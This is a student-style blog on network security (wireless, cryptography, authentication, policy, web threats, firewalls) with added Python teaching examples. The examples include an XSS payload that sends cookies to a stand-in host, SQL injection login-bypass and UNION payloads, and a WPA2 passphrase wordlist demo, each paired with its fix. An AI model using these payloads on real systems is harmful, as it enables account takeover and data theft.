Thursday, 20 June 2013

M3 - Report on the similarities and differences between securing wireless and wired networked systems.


On a wired network an attacker normally needs physical access to a socket or cable before they can intercept traffic or use your connection. On a wireless network the signal carries beyond your walls, so somebody in a neighbouring building or sitting in a car outside can see your network and, if it is open or weakly protected, join it within seconds, use your bandwidth and read whatever is sent over it. That is why wireless is regarded as the less secure of the two. To make the problem worse, some routers are still delivered with encryption disabled, so anybody can connect without entering a password, and most home users do not realise they need to enable anything, leaving them very exposed.
The good news is that securing a wireless network is not hard, and doing so stops others from using your internet connection and from using the wireless network as a route onto your computers. Changing the SSID removes one easy hint: if you leave it as "BtHomeHub-4106" an attacker can see you have a BT Home Hub and try that model's default admin password against the router's management page. Bear in mind that renaming only removes the hint, since the vendor can still be read from the access point's hardware address, so the default admin password must be changed as well. You can also turn SSID broadcasting off, so your network does not appear when somebody searches for wireless networks and your own devices have to be given the name manually; this is an obscurity measure rather than a real control, because the SSID is still transmitted in the clear whenever one of your devices connects. The main protection is encryption: WEP, WPA or WPA2. WEP is broken and can be cracked in minutes, WPA was an interim fix, and WPA2 (with AES-CCMP) is the one to use; its successor WPA3 has since been published. With encryption enabled anybody joining the network must supply the passphrase, and without it they are denied access. Even WPA2 can be attacked by a skilled attacker who records the handshake a legitimate client performs when it joins and then tries candidate passphrases offline, which is why the default passphrase must be changed: defaults printed on the router often follow a known vendor pattern and appear in attackers' wordlists. Choose a long passphrase that mixes letters, numbers and symbols, or better still a long random one, so that offline guessing becomes infeasible.
Disabling DHCP and using static addresses, or giving the router a list of permitted MAC addresses, is often recommended as the strongest measure, but it is actually one of the weakest. A MAC address is sent in the clear in every frame, so an attacker can read one belonging to a permitted computer and set their own adapter to the same value, and picking a free static IP address is trivial. Treat MAC filtering and static addressing as a nuisance for casual freeloaders, not as a barrier against a deliberate attacker; they are no substitute for WPA2 with a strong passphrase. Placing the router in the middle of the house rather than next to a window reduces how far the signal reaches outside, so anybody who does connect from outside gets a poor link, but the signal cannot be kept inside the building.
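To show concretely why the default SSID and a weak passphrase matter together, here is an added Python example (not part of the original post) of how WPA/WPA2-Personal turns the passphrase into the 256-bit Pairwise Master Key: PBKDF2-HMAC-SHA1 with the SSID as the salt and 4096 iterations, as specified in IEEE 802.11i. The wordlist, the SSIDs and the idea of comparing PMKs directly are constructed for the illustration; a real attacker checks candidates against the MIC in a captured four-way handshake rather than against the PMK itself, but the derivation being attacked is the same.

```python
from __future__ import annotations

import hashlib

# WPA/WPA2-Personal derives the Pairwise Master Key (PMK) from the passphrase
# with PBKDF2-HMAC-SHA1, 4096 iterations, 256-bit output, salted with the SSID.
# The derivation is deterministic, which is exactly why a default passphrase
# on a default SSID is a problem.
def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def precompute_table(ssid: str, wordlist: list[str]) -> dict[bytes, str]:
    """Precompute one PMK per candidate passphrase. The table is only valid for
    this exact SSID, because the SSID is the salt."""
    return {wpa2_pmk(word, ssid): word for word in wordlist}


def lookup(table: dict[bytes, str], observed_pmk: bytes) -> str | None:
    """Return the passphrase if the PMK was precomputed, else None."""
    return table.get(observed_pmk)


# Constructed wordlist. Real attacker lists run to millions of entries and are
# built around each vendor's default passphrase format.
WORDLIST = ["password", "letmein", "admin1234", "wifi-2013", "Summer2013!"]

DEFAULT_SSID = "BTHomeHub-4106"   # the sort of default name the text warns about
RENAMED_SSID = "kettle-upstairs"  # the same router after the owner renamed it


def demo() -> dict[str, str | None]:
    # Built once for the default SSID, the table can be reused against every
    # network that still carries that name...
    table = precompute_table(DEFAULT_SSID, WORDLIST)
    hit = lookup(table, wpa2_pmk("letmein", DEFAULT_SSID))      # "letmein"

    # ...but it is useless once the SSID changes, because every PMK changes
    # with the salt, even though the passphrase is the same weak word.
    miss = lookup(table, wpa2_pmk("letmein", RENAMED_SSID))     # None

    # Renaming only buys time: the attacker can rebuild the table for the new
    # name. What actually stops the attack is a passphrase that is not in any
    # wordlist, i.e. long and random.
    return {"default_ssid": hit, "renamed_ssid": miss}


if __name__ == "__main__":
    print(demo())
```

The test vector from the 802.11i standard (passphrase "password", SSID "IEEE") can be used to check that wpa2_pmk is computing the real thing rather than an approximation.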
Wired networks are generally considered more secure because gaining access requires a physical connection via a cable. They are not completely safe, and there are a number of things you can do to keep them secure. The obvious one is physical security: keeping server rooms and wiring cabinets locked and only allowing authorised members of staff in greatly reduces the chance of a breach.
Shielded cable is often suggested as a security measure, but its main purpose is reducing electromagnetic interference and emissions; it makes passive pickup of signals radiating from the cable harder, but it does nothing to stop somebody who can reach the cable from splicing a tap into it. Cables on show are therefore a risk, and it is better to run them through ceilings, locked risers or conduit, or underground, where they cannot be reached. Rather than trusting the cable, protect the traffic itself: IPsec (Internet Protocol Security) is a set of protocols for securing packets at the IP layer. Its ESP mode encrypts packets and adds an integrity check, so any packet modified in transit fails verification and is dropped, and an attacker who does tap the cable sees only ciphertext and cannot alter it undetected. A strong security policy and proper staff training so people are aware of the risks should also help prevent breaches.
Security tools and applications that monitor the network help secure both wired and wireless networks; these include intrusion detection systems, proxies and firewalls, which restrict which hosts and services users can reach and flag suspicious traffic.
Physical security is the first line of defence for both wired and wireless networks: if someone gains access to the physical network they can do a great deal of damage. Firewalls, IDS and anti-virus are also recommended for both types of network. Keeping the operating system and all applications patched is just as important, because updates close the known vulnerabilities that attackers and malware exploit, and updated anti-virus definitions are what let it recognise new threats.

Tuesday, 28 May 2013

D2 - Compare the security benefits of different cryptography techniques.


Symmetric Cryptography
A symmetric key algorithm is an encryption system in which the sender and receiver share a single secret key that is used both to encrypt and to decrypt the message. The key is a secret value (in practice a string of random bits; in the simplest textbook examples a word or a number) that the algorithm applies to the plaintext to make it unreadable. The algorithm itself is not secret, only the key is; it acts like a password so that only the sender and receiver can decrypt and read the message. Symmetric systems are simple and fast, which is why they are used for bulk data, but their main weakness is key distribution: the key has to reach the receiver somehow, and anyone who intercepts it on the way can decrypt every message protected with it.

Stream Cipher & Block Cipher

A stream cipher is a type of symmetric cipher designed to be very fast; it generates a pseudo-random keystream from the key and combines it with the plaintext one digit (usually one bit or byte) at a time, typically with XOR, so each plaintext digit becomes one ciphertext digit. Block ciphers instead transform fixed-size blocks of data (64 bits for DES, 128 bits for AES). Used on its own, a block cipher always turns the same plaintext block into the same ciphertext block under the same key, which leaks patterns; that is why block ciphers are run in a mode of operation such as CBC or CTR that mixes in an initialisation vector or counter. With a stream cipher the transformation of each digit depends on its position in the keystream, so identical plaintext digits produce different ciphertext; the corresponding danger is that the same keystream must never be reused for two messages, because XORing the two ciphertexts together then cancels it out.

Asymmetric Cryptography 

Asymmetric encryption is a method that uses a pair of related keys:
  • A Public Key - can be given to everyone
  • A Private Key - kept secret by its owner, the recipient of the message
When the CEO wants to send a confidential message to one of his employees, the CEO encrypts it with the employee's public key. That message can then only be decrypted with the employee's private key, which only the employee holds. The keys are related so that what one key encrypts only the other can decrypt: for confidentiality you encrypt with the recipient's public key, and for a digital signature the sender uses their own private key, which anybody can check with the matching public key. This avoids having to share a secret key in advance, but it is much slower than symmetric encryption, so in practice the asymmetric keys are used to exchange a symmetric session key that encrypts the actual data. A disadvantage is that you need the recipient's genuine public key: the organisation needs a directory of public keys, and those keys must be certified (for example by a certificate authority) so that an attacker cannot substitute their own public key and read the messages.

DES Encryption

DES is short for Data Encryption Standard, an encryption method developed at IBM in the mid-1970s, published as a US federal standard (FIPS 46) in 1977 and adopted as an ANSI standard in 1981. DES is a block cipher, which means it encrypts data in 64-bit blocks rather than character by character. The key is written as 64 bits, but 8 of those bits are used for parity (error detection), so the effective key size is 56 bits. This method is now obsolete: a 56-bit key can be found by exhaustive search with modest hardware (the EFF's purpose-built machine did it in under three days in 1998), and DES should not be used for new systems.

Triple DES

Triple DES or 3DES applies the DES algorithm three times to each block to make the message harder to break without designing a new cipher. It uses two or three different keys; 3DES can work in different modes, and the mode chosen dictates how many keys there are and whether the middle step is an encryption or a decryption:
  • DES-EEE3 - three different keys; the data is encrypted, encrypted, encrypted.
  • DES-EDE3 - three different keys; the data is encrypted, decrypted, encrypted.
  • DES-EEE2 - two different keys; the first and third encryption steps use the same key.
  • DES-EDE2 - the same as DES-EDE3 but with two keys; the first and third steps use the same key.
The EDE form is the usual one because setting all three keys equal makes it behave exactly like single DES, so old systems stay compatible. Three-key 3DES gives roughly 112 bits of security (not 168, because of meet-in-the-middle attacks) and two-key 3DES roughly 80; both are slow and keep the 64-bit block size, so AES has replaced them.

Hashing
Hashing is when you generate a fixed-size value from a message of any length. The hash value is much smaller than the text itself and is generated by a one-way formula designed so that it is infeasible to find another message with the same hash value or to work back from the hash to the message. For example, if John wants to send a message to Nathan, John calculates a hash of the message and attaches it. When Nathan receives the message he performs the same hash function and compares the result with John's; if the two values match, the message arrived as John sent it, and if they differ it was corrupted or altered in transit and Nathan should reject it. On its own, though, this only protects against accidental corruption: an attacker who changes the message in transit can simply recompute the hash of the altered message and attach that, and Nathan will accept it. To detect deliberate tampering the hash has to be bound to a secret, either as a message authentication code (an HMAC computed with a key that only John and Nathan share) or as a digital signature, described next.
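The difference between a bare hash and a keyed MAC, as an added Python example using only the standard library (not code from the original post; the message, the shared key and the man-in-the-middle are constructed for the illustration):

```python
import hashlib
import hmac
import os


def plain_hash_tag(message: bytes) -> bytes:
    """Scheme 1, as in the John/Nathan example: a bare SHA-256 of the message."""
    return hashlib.sha256(message).digest()


def plain_hash_verify(message: bytes, tag: bytes) -> bool:
    return plain_hash_tag(message) == tag


def hmac_tag(key: bytes, message: bytes) -> bytes:
    """Scheme 2: HMAC-SHA256 (RFC 2104); the tag depends on a key only the
    two parties share, so nobody else can compute one."""
    return hmac.new(key, message, hashlib.sha256).digest()


def hmac_verify(key: bytes, message: bytes, tag: bytes) -> bool:
    # compare_digest runs in constant time so an attacker cannot learn how
    # many leading bytes of a guessed tag were right from the response time.
    return hmac.compare_digest(hmac_tag(key, message), tag)


def tamper(message: bytes) -> bytes:
    """Man in the middle rewrites the amount on its way from John to Nathan."""
    return message.replace(b"amount=100;", b"amount=9000;")


def run_scenario() -> dict[str, bool]:
    key = os.urandom(32)   # constructed: shared out of band between John and Nathan
    msg = b"to=Nathan;amount=100;ref=invoice-42"   # constructed sample message

    # Scheme 1: the attacker alters the message AND recomputes the hash, since
    # the hash needs no secret. Nathan's check passes and the fraud goes through.
    forged = tamper(msg)
    hash_accepts_forgery = plain_hash_verify(forged, plain_hash_tag(forged))

    # Scheme 2: the attacker can alter the message but not produce a matching
    # tag without the key. The best they can do is reuse John's original tag,
    # or attach a keyless hash, and both fail verification.
    tag = hmac_tag(key, msg)
    hmac_accepts_forgery = hmac_verify(key, forged, tag)
    hmac_accepts_keyless_hash = hmac_verify(key, forged, plain_hash_tag(forged))
    hmac_accepts_genuine = hmac_verify(key, msg, tag)

    return {
        "plain_hash_accepts_forgery": hash_accepts_forgery,        # True (bad)
        "hmac_accepts_forgery": hmac_accepts_forgery,              # False
        "hmac_accepts_keyless_hash": hmac_accepts_keyless_hash,    # False
        "hmac_accepts_genuine": hmac_accepts_genuine,              # True
    }


if __name__ == "__main__":
    for check, result in run_scenario().items():
        print(f"{check}: {result}")
```

Note that HMAC still does not tell Nathan which of the key holders sent the message; if John and Nathan both hold the key, either could have produced the tag. Proving it was John specifically needs a signature with a key only John holds.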

Digital Signature

A digital signature is a hash of the message that has been encrypted, or more precisely signed, with the sender's private key; anybody with the sender's public key can decrypt it and compare the result with their own hash of the message. Nobody without the private key can produce a valid signature, so as long as the private key stays secret an impostor cannot sign documents in the sender's name, and any change to the document after signing makes the signature fail. A digital signature therefore proves who the message came from and that it has not been altered. It does not prove that the content is true, and it does not provide confidentiality; the signature links the message to the key, and a digital certificate is what links that key to a real person or organisation.

M2 - Suggest how users can be authenticated to gain access to a networked system

Different Types of Access Security

Identification - This is when somebody says who they are, for example by giving a username.

Authentication - This is when somebody proves they are who they say they are, using something they know, something they have or something they are; showing a passport or driving licence at a desk is the physical-world version of this.

Authorisation - This is when the system decides what the authenticated person is permitted to do; proving who you are does not by itself give you the right to do anything.


Two-Factor Authentication
Two-factor authentication is when two different types of proof are required, for example something you know combined with something you have. When withdrawing money from an ATM you need the valid debit card and the corresponding PIN. Two-factor authentication is far more secure than single-factor authentication because the attacker has to obtain both, and they have to be obtained in different ways: a password can be phished or keylogged from anywhere in the world, but the card or phone has to be stolen as well. Two passwords, or a password plus a secret question, are not two factors because they are both things you know.

Username/Password
This method requires the user to provide a valid username and the corresponding password; if either is incorrect they are denied access. It is a single factor, something you know, because the username is not secret (it is often an email address) and only the password protects the account, although the password can be changed regularly if it is suspected of being compromised. An advantage is that there is nothing physical for an attacker to steal, such as an ID card or key, and nothing to issue to users. The disadvantage is that if an attacker gets hold of the password (through a keylogger, a phishing email, a breach of another site where the same password was reused, or by looking over the user's shoulder) they can log in from anywhere, and the system cannot tell them apart from the genuine user. Passwords must also be stored as salted, slow hashes on the server so that a stolen database does not hand out every password directly.
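An added Python example (not from the original post) of how the username/password factor and a second, possession factor fit together on the server: passwords are stored as salted PBKDF2 hashes, and the second factor is a time-based one-time code (RFC 6238 TOTP, built on RFC 4226 HOTP) computed from a secret shared with the user's phone. Function names, the sample password and the enrolment flow are assumptions made for the illustration; the HOTP/TOTP arithmetic follows the RFCs.

```python
from __future__ import annotations

import hashlib
import hmac
import os
import struct
import time


# ---- Factor 1: something you know -------------------------------------------
# The server never stores the password itself, only a salted, deliberately slow
# hash of it (PBKDF2-HMAC-SHA256 here; bcrypt/Argon2 are preferable if available).
def hash_password(password: str, salt: bytes | None = None,
                  iterations: int = 200_000) -> tuple[bytes, bytes, int]:
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest, iterations


def verify_password(password: str, salt: bytes, digest: bytes, iterations: int) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)   # constant-time comparison


# ---- Factor 2: something you have -------------------------------------------
# HOTP (RFC 4226): truncate HMAC-SHA1(secret, counter) to a 6-digit code.
def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                   # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


# TOTP (RFC 6238): the counter is the number of 30-second steps since the epoch,
# so the phone and the server agree on it without talking to each other.
def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    return hotp(secret, unix_time // step, digits)


def verify_totp(secret: bytes, code: str, unix_time: int, window: int = 1) -> bool:
    """Accept the current step and +/- `window` neighbours to tolerate clock drift.
    A real server also records used codes so one cannot be replayed."""
    counter = unix_time // 30
    return any(hmac.compare_digest(hotp(secret, counter + d), code)
               for d in range(-window, window + 1))


# ---- Putting the two factors together ----------------------------------------
def login(stored: tuple[bytes, bytes, int], totp_secret: bytes,
          password: str, code: str, unix_time: int) -> bool:
    salt, digest, iterations = stored
    # Evaluate both factors unconditionally so a failed password does not short-
    # circuit and reveal, through timing, which factor was wrong.
    password_ok = verify_password(password, salt, digest, iterations)
    code_ok = verify_totp(totp_secret, code, unix_time)
    return password_ok and code_ok


if __name__ == "__main__":
    # Constructed enrolment: the user picks a password and the server issues a
    # TOTP secret that is loaded into their authenticator app.
    stored = hash_password("correct horse battery staple")
    secret = os.urandom(20)
    now = int(time.time())
    print("app shows:", totp(secret, now))
    print("keylogged password alone:",
          login(stored, secret, "correct horse battery staple", "000000", now))
    print("password + current code:",
          login(stored, secret, "correct horse battery staple", totp(secret, now), now))
```

The point of the last two lines: a keylogger that captured the password still cannot log in, because the code it also captured expired within 30 seconds and the next one needs the secret on the phone. The RFC test vectors (secret "12345678901234567890") are the quickest way to confirm the HOTP/TOTP implementation is right.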

Biometrics Authentication
Biometrics is a distinctive method of authentication because it makes decisions based on the user's behaviour or physical attributes, i.e. fingerprints, retina scan, palm scan. These are harder for an attacker to obtain than a password and cannot simply be passed on to somebody else, which is what makes this method attractive. It is not as strong as it first appears, though: a fingerprint is left on everything you touch and sensors have been fooled with copies, and unlike a password a compromised biometric cannot be changed. The other disadvantages are that it is expensive to set up and maintain, it can be slower than entering a password, and some legitimate users are rejected (or impostors accepted) because matching is never exact.


Digital Certificate
A digital certificate binds a public key to the identity of its owner (a person, or more commonly a website) and is signed by a recognised certificate authority that has checked that identity. When you connect to a site over HTTPS the site presents its certificate, your browser checks the authority's signature and that the name matches, and only then sets up an encrypted connection using the key in the certificate. That is what makes it safe to enter confidential information such as credit card numbers when making online purchases: the encryption stops eavesdroppers reading the data, and the certificate is what assures the user that they are talking to the genuine website rather than an impostor. Certificates can also be issued to individuals and used to sign and encrypt email. The disadvantages are that certificates cost money and must be renewed and managed, and that a user who clicks through browser certificate warnings gets none of the protection.




P3 - Explain what an organisation can do to minimise security breaches in networked systems

Policies and Procedures

Security Policies
A security policy is a document containing the rules and regulations regarding computer network access within an organisation. The purpose of the security policy is so that all the users within the organisation have a set of rules to follow and also so the organisation can protect their devices. The security policy will be constantly changing and being improved because over time they will discover more and more things they have missed out. It is important to have a security policy in place so that all of their data is secure and can only be accessed by authorised people.

Education and training
All organisations should have policies in place regarding education and training, this is to ensure all colleagues are able to use the latest software and are aware of the latest and best techniques to use when working on the organization's network. If a colleague regularly uses a piece of software, and a 2013 version is released with new helpful features, training all of your colleagues to use the latest version will cost you money, but in return it will theoretically enable them to produce work faster and easier than before. 

Backup
All organisations should have very clear policies regarding backup. In most IT organisations a backup is taken at the end of each day so that work completed that day cannot be lost, and the backup jobs are checked regularly, usually monthly, to ensure they are running correctly. Checking that a backup ran is not enough; the policy should also require periodic test restores, and at least one copy should be kept offline or off site so that a fire, theft or malware on the network cannot destroy the backups along with the originals.

Monitoring
Organisations should have policies in place regarding computer monitoring for all employees. Monitoring refers to watching an employees screen to ensure they are not doing anything they are not meant to be doing, and that they are getting on with their work as they should be. Random monitoring should take place at various times to ensure that the network stays secure and no employees are trying to do anything they shouldn't be.

Access permissions
Access permissions are a list of rules stating what things a user is able to do on their computer, for example some people may have access to more data than others. Every employee working for the organisation will have a set of access permissions unique to them, although usually it is done in groups, for example managers will have access to more than a regular employee would have access to.

Clarification of User Responsibility



Password Policy
A password policy dictates what an employee is allowed to have as their password, for example a minimum length and whether it must contain numbers and symbols, and it should forbid obviously weak or previously breached passwords. Many policies also force a change every so often, typically every six weeks or so; note that current guidance (NIST SP 800-63B) advises against routine expiry because it pushes users towards predictable variations of the same password, and recommends changing a password when there is evidence it has been compromised instead. Password policies are designed to keep employees' accounts safe and make it harder for an attacker to gain access to the network.

Data Protection Policy
A data protection policy controls how personal information is used by the organisation; it has to follow strict rules called 'data protection principles' to ensure personal data is used fairly and lawfully and that the organisation abides by the Data Protection Act.

Software Installation
Employees cannot install any software they like on the organization's computers, this is because software could contain harmful files such as viruses that could access the network and the corrupt sensitive data. When an employee needs to use a piece of software they will have to apply to get it installed on their PC.

Internet use policy
an internet use policy will list the do's and don'ts when using the internet at work, for example employees are not allowed to access the internet for personal use i.e social networking. They must only access the internet if it is work related.

Continuous Professional Development (CPD)
It is important to ensure that every member of staff working for your organisation has up to date knowledge regarding security threats. Organising training sessions is important to ensure your network stays secure. Your organisation should have a policy regarding CPD for IT professionals.

Physical Security
Organisations need to physically secure their computer systems, there is no point spending time and money preventing hackers from gaining access to your network when somebody could easily walk into the office and sit down at one of your physical computers connected to the network. There are a few methods you could use to physically secure your network:

Lock and Key - Using a lock and key is a good method because only the keyholders will be able to gain access, the disadvantage of this method however, is that the key could be stolen and used by anybody.


CCTV/Security Guards - Using cameras and security guards would be a very good method to use as it is very secure and will be harder for an attacker to bypass. The disadvantage of this method is that it is by far the most expensive as you will have to pay the guards a salary.


Logging of entry - This is a secure method that will only allow card holders onto the organization's premises, however it shares the same disadvantage of the lock and key method where anybody can steal a card and use it to gain access.


Biometrics Authentication - This method allows access based on physical attributes, i.e. fingerprints, retina scan, palm scan. These cannot be lent to somebody else or guessed, which makes the method attractive, although biometric readers can be fooled by copies and a compromised fingerprint cannot be changed. The disadvantages are that it is very expensive to set up and maintain and it can also be more time consuming than simply entering a password or swiping a card.


Risk Assessment and Penetration Testing

A risk assessment in the workplace covers health and safety hazards such as broken chairs and loose cables, but a security risk assessment does the same thing for the network: it lists the assets (servers, data, services), the threats to them and their weaknesses, and rates each by how likely it is and how much damage it would do, so that the money and effort go on the biggest risks first. Penetration testing is when the company hires an ethical hacker to try to gain access to its network within an agreed scope; if the tester is able to break in, the company receives a report of how it was done and can fix the weaknesses and improve its security before a real attacker finds them.

Wednesday, 27 March 2013

D1 - Discuss Recent Network Threats

Cross-Site Scripting (XSS)
Cross-Site Scripting is a vulnerability found mostly in web applications. XSS allows attackers to inject client-side script into web pages that are then viewed by other users, because the application puts user-supplied input into its HTML without encoding it. The victims' browsers run that script as if it came from the site itself, so the page looks normal while the script acts with the victim's access: depending on what the attacker writes it can steal the session cookie and let them log in as the victim, perform actions in the victim's name, or rewrite the page to capture passwords. The effects range from a minor nuisance to a complete takeover of the account, which is why XSS is described as bypassing authentication: the attacker never needs the password. The fix is to encode output for the context it is placed in (HTML, attribute, JavaScript or URL) and to set the HttpOnly flag on session cookies so script cannot read them.
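As an added example (not part of the original post), here is the flaw and its fix in Python: a comment rendered into HTML by string concatenation, beside the same rendering with output encoding. The comment strings, the evil.example host and the helper names are constructed for the illustration, and html.escape covers only the HTML body and attribute contexts; script, URL and CSS contexts each need their own encoder.

```python
import html

# Constructed stored-XSS scenario: a visitor's comment is saved and later
# rendered into the page shown to every other visitor.
ATTACKER_COMMENT = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'
HONEST_COMMENT = 'Great post, 10/10 & would read again <3'


def render_vulnerable(comment: str) -> str:
    """User input concatenated straight into the HTML: the browser treats the
    attacker's <script> as part of the page and runs it with the site's origin."""
    return '<div class="comment">' + comment + '</div>'


def render_safe(comment: str) -> str:
    """Output encoding for the HTML body context: <, >, &, " and ' become
    entities, so the browser displays the text and executes nothing."""
    return '<div class="comment">' + html.escape(comment, quote=True) + '</div>'


def render_attribute_safe(title: str) -> str:
    """Attribute context. quote=True is essential here: without it a value like
    x" onmouseover="alert(1) would close the attribute and add a new one."""
    return '<a title="' + html.escape(title, quote=True) + '">link</a>'


def contains_live_script(page: str) -> bool:
    """Crude check for this example only: an unencoded <script> tag is present."""
    return "<script" in page.lower()


def demo() -> dict[str, bool]:
    return {
        "vulnerable_runs_script": contains_live_script(render_vulnerable(ATTACKER_COMMENT)),   # True
        "safe_runs_script": contains_live_script(render_safe(ATTACKER_COMMENT)),               # False
        "safe_keeps_text": "10/10 &amp; would read again &lt;3" in render_safe(HONEST_COMMENT),  # True
        "attribute_breakout": '" onmouseover' in render_attribute_safe('x" onmouseover="alert(1)'),  # False
    }


if __name__ == "__main__":
    print(render_vulnerable(ATTACKER_COMMENT))
    print(render_safe(ATTACKER_COMMENT))
    print(demo())
```

The honest comment shows why encoding rather than stripping is the right fix: the ampersand and the "<3" survive as visible text, nothing the user typed is lost, and a template engine that escapes by default does this for every variable so it cannot be forgotten.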


SQL Injection
SQL injection is a technique used to attack data-driven applications by typing fragments of SQL statements into entry fields on a website, in an attempt to get the application to pass a newly formed rogue SQL command to the database. It is a code injection technique that exploits a flaw in the application's software: the vulnerability occurs when user input is pasted straight into the text of a query. The injected SQL can read database information such as credit card details or password hashes, change or delete content, and on some databases run commands on the server. Filtering input for suspicious characters is not a reliable fix, because attackers find encodings the filter misses; the correct prevention is to use parameterised queries (prepared statements), which send the query text and the user's values to the database separately so that the input can never be parsed as SQL, together with least-privilege database accounts that limit what a successful injection can reach.
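The vulnerable login beside the parameterised one, as an added Python example using an in-memory SQLite database (constructed for the illustration; not code from the original post). Passwords are stored in clear text in this toy table purely to keep the query simple; a real application stores hashes.

```python
from __future__ import annotations

import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory user table standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, card TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "s3cret", "4111-1111-1111-1111"),
        ("bob", "hunter2", "5500-0000-0000-0004"),
    ])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The query is built by string concatenation, exactly the flaw described above:
    # whatever the user types becomes part of the SQL the database parses.
    query = ("SELECT 1 FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_parameterised(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders send the values separately from the SQL text; the database
    # never parses user input as SQL, so quotes and OR clauses are just data.
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list[str]:
    # Same flaw in a lookup that returns data, where UNION lets the attacker
    # pull a different column (here the card numbers) out through the result.
    rows = conn.execute(
        "SELECT username FROM users WHERE username = '" + username + "'").fetchall()
    return [r[0] for r in rows]


def find_user_parameterised(conn: sqlite3.Connection, username: str) -> list[str]:
    rows = conn.execute("SELECT username FROM users WHERE username = ?", (username,)).fetchall()
    return [r[0] for r in rows]


# Classic payloads. The first closes the string and adds an always-true
# condition; the second closes it, appends a UNION, and comments out the rest.
BYPASS = "' OR '1'='1"
EXFIL = "' UNION SELECT card FROM users --"


def demo() -> dict[str, object]:
    conn = make_db()
    return {
        "vulnerable_bypassed": login_vulnerable(conn, "alice", BYPASS),         # True
        "parameterised_bypassed": login_parameterised(conn, "alice", BYPASS),   # False
        "parameterised_genuine": login_parameterised(conn, "alice", "s3cret"),  # True
        "vulnerable_leaks_cards": sorted(find_user_vulnerable(conn, EXFIL)),
        "parameterised_leaks_cards": find_user_parameterised(conn, EXFIL),      # []
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

In the vulnerable login the database sees `... AND password = '' OR '1'='1'`, and because AND binds tighter than OR the row matches regardless of the password. The parameterised version looks for a user whose password is literally the string `' OR '1'='1`, which does not exist.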


Google Hacking
Google hacking means using carefully chosen search queries to find sensitive material that has been indexed. The Google Hacking Database (GHDB) is a public collection of such queries. Google tries to limit automated abuse, but the information is already indexed, so the searches still work. Using these queries an attacker can produce a list of websites that expose login portals, configuration files containing passwords, directory listings and other sensitive files, and which may therefore be vulnerable to attack. The defence is on the website side: do not publish sensitive files on a public server in the first place, and check what search engines have indexed about your own domain.

Recent Security Breaches

Twitter
On 1 February 2013, Twitter announced that it had detected unauthorised access attempts over the course of the previous week. The attackers had gone after user account information such as usernames, email addresses, session tokens and encrypted, salted versions of passwords (i.e. salted hashes, not the passwords themselves). Twitter said approximately 250,000 user accounts may have been affected, including those of corporate employees and reporters; it reset those users' passwords and revoked their session tokens. Twitter said the attack was not the work of amateurs and that the methods used were extremely sophisticated.


Yahoo
In July 2012, Yahoo announced that over 450,000 email addresses and passwords had been stolen from one of the company's databases and posted publicly online. It turned out that Yahoo had stored these usernames and passwords in plain text, not hashed, so the attacker did not even have to crack them. As well as having their email accounts compromised, some Yahoo customers found there were further problems, because many of the leaked passwords were identical to those they used for other accounts, such as PayPal or online banking, so one breach opened several accounts.

Tuesday, 19 March 2013

M1 - Explain The Operation Of Different Intruder Detection Systems

Firewalls
Firewalls are designed to prevent unauthorised access to a computer or network. You can implement a firewall in both hardware and software, or a combination of both. A firewall will monitor data packets coming in and out of the network it is protecting and will enforce the company's network security policy. It filters out the packets that look suspicious and do not meet the specified security criteria. Most organisations use firewalls to protect their network from the Internet.
There are a few different types of firewall, these are:
  • Packet Filtering Firewall
  • Stateful Inspection Packet Filtering Firewall
  • Proxy Firewall
Packet Firewalls
Packet filtering was the first type of firewall. A packet filtering firewall controls what data can flow into and out of a network by accepting or rejecting each packet on the basis of a set of user-defined rules called access control lists (ACLs). Each ACL entry specifies what to match, typically source and destination address, protocol and port, and whether matching packets are permitted or denied; the firewall applies the list to every packet it receives, in order, and the first matching entry decides. The main advantage of a packet filtering firewall is flexibility: it works with any protocol or application, and because it carries out no deep processing on the packets it runs at high speed. The disadvantages follow from the small number of fields used in the decision: it is easy to misconfigure, it cannot tell a reply to a legitimate outbound connection from an unsolicited inbound packet (so rules often have to leave wide ranges of ports open), and it cannot prevent attacks that exploit application-specific vulnerabilities inside otherwise permitted traffic.

Stateful Firewalls
Stateful inspection packet filtering tracks each connection travelling across the firewall. When a connection is permitted by the rules, the firewall records it in a state table, and subsequent packets belonging to that connection, including the replies coming back, are allowed through without a separate rule. Packets that do not belong to any known connection and do not open a permitted new one are dropped. Filtering decisions are therefore based not only on user-defined rules (as in packet filtering) but also on the context established by the packets that have already passed through, which closes the wide-open port ranges a stateless filter needs.
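An added Python simulation (not from the original post) of the two designs above: a first-match access control list, then a stateful wrapper around the same list that records permitted connections and lets their replies back in. Addresses, ports and the rule set are constructed for an imaginary office LAN.

```python
from __future__ import annotations

import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False   # True for the first packet of a TCP connection


@dataclass(frozen=True)
class Rule:
    action: str                 # "allow" or "deny"
    src_net: str | None = None  # None means any
    dst_net: str | None = None
    dport: int | None = None


# Constructed rule set for an imaginary office LAN 10.0.0.0/24 with a mail
# server at 10.0.0.10. First match wins; the final rule is the default deny.
ACL = [
    Rule("allow", src_net="10.0.0.0/24", dport=443),        # LAN may browse HTTPS out
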